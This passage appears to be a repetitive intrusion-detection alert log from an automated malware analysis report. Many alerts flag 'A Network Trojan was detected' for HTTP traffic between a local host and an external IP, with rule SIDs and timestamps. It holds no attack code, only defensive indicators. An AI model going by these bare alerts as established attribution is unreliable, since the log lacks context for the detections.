            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749868802024313 01/05/23-08:53:01.029018
            SID:2024313
            Source Port:49868
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749806802825766 01/05/23-08:52:42.779655
            SID:2825766
            Source Port:49806
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749720802825766 01/05/23-08:52:16.949813
            SID:2825766
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749802802024318 01/05/23-08:52:41.641382
            SID:2024318
            Source Port:49802
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749860802025381 01/05/23-08:52:58.886735
            SID:2025381
            Source Port:49860
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749872802021641 01/05/23-08:53:02.084337
            SID:2021641
            Source Port:49872
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749958802021641 01/05/23-08:53:27.233105
            SID:2021641
            Source Port:49958
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749758802825766 01/05/23-08:52:27.765970
            SID:2825766
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750040802021641 01/05/23-08:53:52.135869
            SID:2021641
            Source Port:50040
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750081802825766 01/05/23-08:54:03.233046
            SID:2825766
            Source Port:50081
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749832802025381 01/05/23-08:52:49.809310
            SID:2025381
            Source Port:49832
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749859802024318 01/05/23-08:52:58.622571
            SID:2024318
            Source Port:49859
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749997802025381 01/05/23-08:53:39.208772
            SID:2025381
            Source Port:49997
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498492025483 01/05/23-08:52:55.968261
            SID:2025483
            Source Port:80
            Destination Port:49849
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749830802024313 01/05/23-08:52:49.252221
            SID:2024313
            Source Port:49830
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498272025483 01/05/23-08:52:48.539251
            SID:2025483
            Source Port:80
            Destination Port:49827
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749961802825766 01/05/23-08:53:29.597138
            SID:2825766
            Source Port:49961
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749784802025381 01/05/23-08:52:36.673037
            SID:2025381
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749830802024318 01/05/23-08:52:49.252221
            SID:2024318
            Source Port:49830
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498382025483 01/05/23-08:52:52.903649
            SID:2025483
            Source Port:80
            Destination Port:49838
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749970802825766 01/05/23-08:53:32.043326
            SID:2825766
            Source Port:49970
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749971802021641 01/05/23-08:53:32.299331
            SID:2021641
            Source Port:49971
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749953802021641 01/05/23-08:53:25.469204
            SID:2021641
            Source Port:49953
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497202025483 01/05/23-08:52:17.036927
            SID:2025483
            Source Port:80
            Destination Port:49720
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749925802021641 01/05/23-08:53:17.874226
            SID:2021641
            Source Port:49925
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499432025483 01/05/23-08:53:22.801221
            SID:2025483
            Source Port:80
            Destination Port:49943
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750078802024313 01/05/23-08:54:02.320663
            SID:2024313
            Source Port:50078
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749920802021641 01/05/23-08:53:16.511672
            SID:2021641
            Source Port:49920
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749942802825766 01/05/23-08:53:22.441601
            SID:2825766
            Source Port:49942
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750028802025381 01/05/23-08:53:48.853917
            SID:2025381
            Source Port:50028
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749981802021641 01/05/23-08:53:34.961120
            SID:2021641
            Source Port:49981
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750078802024318 01/05/23-08:54:02.320663
            SID:2024318
            Source Port:50078
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749802802021641 01/05/23-08:52:41.641382
            SID:2021641
            Source Port:49802
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497152025483 01/05/23-08:52:14.109490
            SID:2025483
            Source Port:80
            Destination Port:49715
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497262025483 01/05/23-08:52:18.785455
            SID:2025483
            Source Port:80
            Destination Port:49726
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749868802024318 01/05/23-08:53:01.029018
            SID:2024318
            Source Port:49868
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498462025483 01/05/23-08:52:55.179194
            SID:2025483
            Source Port:80
            Destination Port:49846
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498572025483 01/05/23-08:52:58.138227
            SID:2025483
            Source Port:80
            Destination Port:49857
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749915802021641 01/05/23-08:53:15.112176
            SID:2021641
            Source Port:49915
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749986802021641 01/05/23-08:53:36.285692
            SID:2021641
            Source Port:49986
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500662025483 01/05/23-08:53:59.180210
            SID:2025483
            Source Port:80
            Destination Port:50066
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749728802025381 01/05/23-08:52:19.268418
            SID:2025381
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750056802025381 01/05/23-08:53:56.463023
            SID:2025381
            Source Port:50056
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750038802025381 01/05/23-08:53:51.593310
            SID:2025381
            Source Port:50038
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500552025483 01/05/23-08:53:56.268231
            SID:2025483
            Source Port:80
            Destination Port:50055
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749896802024318 01/05/23-08:53:08.759564
            SID:2024318
            Source Port:49896
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749740802024313 01/05/23-08:52:22.636691
            SID:2024313
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749799802025381 01/05/23-08:52:40.836883
            SID:2025381
            Source Port:49799
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750051802025381 01/05/23-08:53:55.100340
            SID:2025381
            Source Port:50051
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750066802025381 01/05/23-08:53:59.096230
            SID:2025381
            Source Port:50066
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749948802021641 01/05/23-08:53:24.079081
            SID:2021641
            Source Port:49948
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749896802024313 01/05/23-08:53:08.759564
            SID:2024313
            Source Port:49896
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749740802024318 01/05/23-08:52:22.636691
            SID:2024318
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749976802021641 01/05/23-08:53:33.629058
            SID:2021641
            Source Port:49976
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750023802025381 01/05/23-08:53:47.546596
            SID:2025381
            Source Port:50023
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749711802825766 01/05/23-08:52:12.061796
            SID:2825766
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749867802825766 01/05/23-08:53:00.773467
            SID:2825766
            Source Port:49867
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497312025483 01/05/23-08:52:20.190278
            SID:2025483
            Source Port:80
            Destination Port:49731
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749958802024318 01/05/23-08:53:27.233105
            SID:2024318
            Source Port:49958
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749738802025381 01/05/23-08:52:22.066688
            SID:2025381
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749972802024318 01/05/23-08:53:32.566966
            SID:2024318
            Source Port:49972
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749943802021641 01/05/23-08:53:22.718924
            SID:2021641
            Source Port:49943
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749790802825766 01/05/23-08:52:38.345416
            SID:2825766
            Source Port:49790
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749958802024313 01/05/23-08:53:27.233105
            SID:2024313
            Source Port:49958
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750011802825766 01/05/23-08:53:42.925761
            SID:2825766
            Source Port:50011
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749712802024313 01/05/23-08:52:12.436257
            SID:2024313
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749712802024318 01/05/23-08:52:12.436257
            SID:2024318
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749972802024313 01/05/23-08:53:32.566966
            SID:2024313
            Source Port:49972
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497862025483 01/05/23-08:52:37.298040
            SID:2025483
            Source Port:80
            Destination Port:49786
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749817802024318 01/05/23-08:52:45.747633
            SID:2024318
            Source Port:49817
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497972025483 01/05/23-08:52:40.343463
            SID:2025483
            Source Port:80
            Destination Port:49797
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749817802024313 01/05/23-08:52:45.747633
            SID:2024313
            Source Port:49817
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749830802021641 01/05/23-08:52:49.252221
            SID:2021641
            Source Port:49830
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749812802024318 01/05/23-08:52:44.412618
            SID:2024318
            Source Port:49812
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749895802825766 01/05/23-08:53:08.372653
            SID:2825766
            Source Port:49895
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749766802025381 01/05/23-08:52:30.012463
            SID:2025381
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749901802024313 01/05/23-08:53:11.357263
            SID:2024313
            Source Port:49901
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749812802024313 01/05/23-08:52:44.412618
            SID:2024313
            Source Port:49812
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749968802024313 01/05/23-08:53:31.490288
            SID:2024313
            Source Port:49968
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750045802021641 01/05/23-08:53:53.481872
            SID:2021641
            Source Port:50045
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499652025483 01/05/23-08:53:30.756002
            SID:2025483
            Source Port:80
            Destination Port:49965
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749962802024313 01/05/23-08:53:29.855666
            SID:2024313
            Source Port:49962
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749865802025381 01/05/23-08:53:00.234414
            SID:2025381
            Source Port:49865
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749873802024313 01/05/23-08:53:02.352866
            SID:2024313
            Source Port:49873
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749873802024318 01/05/23-08:53:02.352866
            SID:2024318
            Source Port:49873
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750035802825766 01/05/23-08:53:50.741604
            SID:2825766
            Source Port:50035
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749770802025381 01/05/23-08:52:31.112136
            SID:2025381
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749936802025381 01/05/23-08:53:20.832811
            SID:2025381
            Source Port:49936
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749716802825766 01/05/23-08:52:14.357533
            SID:2825766
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749908802025381 01/05/23-08:53:13.214132
            SID:2025381
            Source Port:49908
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749962802024318 01/05/23-08:53:29.855666
            SID:2024318
            Source Port:49962
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750007802825766 01/05/23-08:53:41.829015
            SID:2825766
            Source Port:50007
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750073802021641 01/05/23-08:54:00.951462
            SID:2021641
            Source Port:50073
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749934802024313 01/05/23-08:53:20.304475
            SID:2024313
            Source Port:49934
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749734802825766 01/05/23-08:52:20.978367
            SID:2825766
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749845802024313 01/05/23-08:52:54.838950
            SID:2024313
            Source Port:49845
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749996802024313 01/05/23-08:53:38.933239
            SID:2024313
            Source Port:49996
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750061802025381 01/05/23-08:53:57.824423
            SID:2025381
            Source Port:50061
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750017802021641 01/05/23-08:53:44.537455
            SID:2021641
            Source Port:50017
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497422025483 01/05/23-08:52:23.269269
            SID:2025483
            Source Port:80
            Destination Port:49742
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750001802825766 01/05/23-08:53:40.243949
            SID:2825766
            Source Port:50001
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749996802024318 01/05/23-08:53:38.933239
            SID:2024318
            Source Port:49996
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499212025483 01/05/23-08:53:16.873916
            SID:2025483
            Source Port:80
            Destination Port:49921
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750068802825766 01/05/23-08:53:59.646284
            SID:2825766
            Source Port:50068
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749911802024318 01/05/23-08:53:14.014731
            SID:2024318
            Source Port:49911
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749839802825766 01/05/23-08:52:53.202583
            SID:2825766
            Source Port:49839
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749845802024318 01/05/23-08:52:54.838950
            SID:2024318
            Source Port:49845
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749721802021641 01/05/23-08:52:17.231128
            SID:2021641
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749934802024318 01/05/23-08:53:20.304475
            SID:2024318
            Source Port:49934
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500772025483 01/05/23-08:54:02.148840
            SID:2025483
            Source Port:80
            Destination Port:50077
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750035802021641 01/05/23-08:53:50.741604
            SID:2021641
            Source Port:50035
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749964802025381 01/05/23-08:53:30.400374
            SID:2025381
            Source Port:49964
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749744802825766 01/05/23-08:52:23.736699
            SID:2825766
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749849802021641 01/05/23-08:52:55.895226
            SID:2021641
            Source Port:49849
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749891802024313 01/05/23-08:53:07.205477
            SID:2024313
            Source Port:49891
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749893802025381 01/05/23-08:53:07.754435
            SID:2025381
            Source Port:49893
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750033802025381 01/05/23-08:53:50.199257
            SID:2025381
            Source Port:50033
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749762802825766 01/05/23-08:52:28.868227
            SID:2825766
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749891802024318 01/05/23-08:53:07.205477
            SID:2024318
            Source Port:49891
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500442025483 01/05/23-08:53:53.305777
            SID:2025483
            Source Port:80
            Destination Port:50044
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749968802024318 01/05/23-08:53:31.490288
            SID:2024318
            Source Port:49968
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749778802021641 01/05/23-08:52:34.958959
            SID:2021641
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749835802024318 01/05/23-08:52:50.902278
            SID:2024318
            Source Port:49835
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499762025483 01/05/23-08:53:33.709700
            SID:2025483
            Source Port:80
            Destination Port:49976
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750005802025381 01/05/23-08:53:41.297546
            SID:2025381
            Source Port:50005
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750007802021641 01/05/23-08:53:41.829015
            SID:2021641
            Source Port:50007
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500332025483 01/05/23-08:53:50.284555
            SID:2025483
            Source Port:80
            Destination Port:50033
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499542025483 01/05/23-08:53:25.808050
            SID:2025483
            Source Port:80
            Destination Port:49954
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749992802025381 01/05/23-08:53:37.885447
            SID:2025381
            Source Port:49992
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749913802025381 01/05/23-08:53:14.593137
            SID:2025381
            Source Port:49913
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749938802825766 01/05/23-08:53:21.374225
            SID:2825766
            Source Port:49938
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749732802025381 01/05/23-08:52:20.401546
            SID:2025381
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749820802021641 01/05/23-08:52:46.558490
            SID:2021641
            Source Port:49820
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749731802021641 01/05/23-08:52:20.113614
            SID:2021641
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749772802825766 01/05/23-08:52:31.644906
            SID:2825766
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749807802024313 01/05/23-08:52:43.044779
            SID:2024313
            Source Port:49807
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499322025483 01/05/23-08:53:19.843053
            SID:2025483
            Source Port:80
            Destination Port:49932
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749807802024318 01/05/23-08:52:43.044779
            SID:2024318
            Source Port:49807
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749809802025381 01/05/23-08:52:43.596832
            SID:2025381
            Source Port:49809
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749863802024318 01/05/23-08:52:59.703117
            SID:2024318
            Source Port:49863
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749911802024313 01/05/23-08:53:14.014731
            SID:2024313
            Source Port:49911
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749863802024313 01/05/23-08:52:59.703117
            SID:2024313
            Source Port:49863
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749706802825766 01/05/23-08:52:09.771973
            SID:2825766
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749837802025381 01/05/23-08:52:51.988001
            SID:2025381
            Source Port:49837
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749877802021641 01/05/23-08:53:03.433942
            SID:2021641
            Source Port:49877
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497912025483 01/05/23-08:52:38.699631
            SID:2025483
            Source Port:80
            Destination Port:49791
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749990802024313 01/05/23-08:53:37.383838
            SID:2024313
            Source Port:49990
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749966802825766 01/05/23-08:53:30.946864
            SID:2825766
            Source Port:49966
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749990802024318 01/05/23-08:53:37.383838
            SID:2024318
            Source Port:49990
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750003802024313 01/05/23-08:53:40.763519
            SID:2024313
            Source Port:50003
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749760802025381 01/05/23-08:52:28.304789
            SID:2025381
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497802025483 01/05/23-08:52:35.592230
            SID:2025483
            Source Port:80
            Destination Port:49780
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750058802825766 01/05/23-08:53:57.002594
            SID:2825766
            Source Port:50058
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749789802025381 01/05/23-08:52:38.076275
            SID:2025381
            Source Port:49789
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749835802024313 01/05/23-08:52:50.902278
            SID:2024313
            Source Port:49835
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749916802021641 01/05/23-08:53:15.372296
            SID:2021641
            Source Port:49916
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750021802024318 01/05/23-08:53:46.361205
            SID:2024318
            Source Port:50021
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749726802024313 01/05/23-08:52:18.702884
            SID:2024313
            Source Port:49726
            Destination Port:80
